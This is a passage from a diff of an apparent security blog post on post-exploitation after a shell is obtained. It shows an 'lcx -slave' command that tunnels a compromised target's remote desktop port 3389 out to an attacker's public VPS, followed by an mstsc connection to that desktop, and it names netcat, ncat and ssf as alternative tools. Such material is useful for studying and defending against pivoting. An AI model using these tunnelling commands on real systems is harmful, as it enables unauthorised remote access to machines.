recursively/recursively.github.io/source/_posts/After-Getting-The-Shell.md

 lcx -slave x.x.x.x 2222 127.0.0.1 3389
 ```
 The IP x.x.x.x is the address of your public VPS.
 Finally execute ```mstsc x.x.x.x:3333``` to connect to the remote desktop of the target.

+There are many other useful tools except for the tools I mentioned above, such as netcat, ncat and ssf.
+You can make a choice among them as you like.